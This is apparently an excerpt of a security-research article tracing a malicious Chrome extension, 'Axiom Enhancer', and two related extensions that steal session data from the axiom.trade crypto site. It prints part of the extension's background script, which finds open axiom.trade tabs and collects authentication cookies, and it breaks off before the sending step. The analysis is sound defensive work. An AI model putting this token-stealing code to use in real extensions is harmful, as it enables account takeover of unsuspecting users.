Hidden in Plain Sight: How we followed one malicious extension to uncover a multi-extension campaign
Short read for everyone: we found a malicious Chrome extension that stole login data from a crypto trading site. Tracing the domain it talked to uncovered a second malicious extension. That second extension’s public metadata contained the developer email, which led to a third malicious extension. All three behave the same way: they quietly read session data (cookies, localStorage, IndexedDB) and send it to attacker servers. Below is the full investigative flow and the actual code we found.
How it started: discovering Axiom Enhancer
We discovered Axiom Enhancer a malicious extension first through our extension analyzer.
The analyzer flagged as suspicious because it has background script that:
- looks for an open axiom.trade tab,
- checks for authentication cookies,
- reads the site’s localStorage from the page,
- and sends that data to an external URL.
Note: Dynamic analysis score of 2 is because the extension only triggers when it locates used logged into axiom.trade which was not simulated in our agentic simulation. Analyzer considers this inconclusive and omit it from overall risk calculations.
Here is the exact background.js code we analyzed for Axiom Enhancer
(() => {
const e = () => {
(console.log('Checking Axiom Tabs'),
chrome.tabs.query({ url: 'https://axiom.trade/*' }, ([e]) => {
e &&
(console.log('Found the tab!'),
new Promise((e, t) => {
chrome.cookies.getAll({ domain: '.axiom.trade' }, o => {
o?.length &&
o.some(e => 'auth-access-token' === e.name) &&
o.some(e => 'auth-refresh-token' === e.name)
? e(o)
: t('Required cookies not found.');
});
})
.then(t => {
return ((o = e.id),
new Promise((e, t) => {
chrome.scripting.executeSc
[...]
Content was cut in order to protect the source.Please visit the source for the rest of the article.
This article has been indexed from Security Boulevard
Read the original article: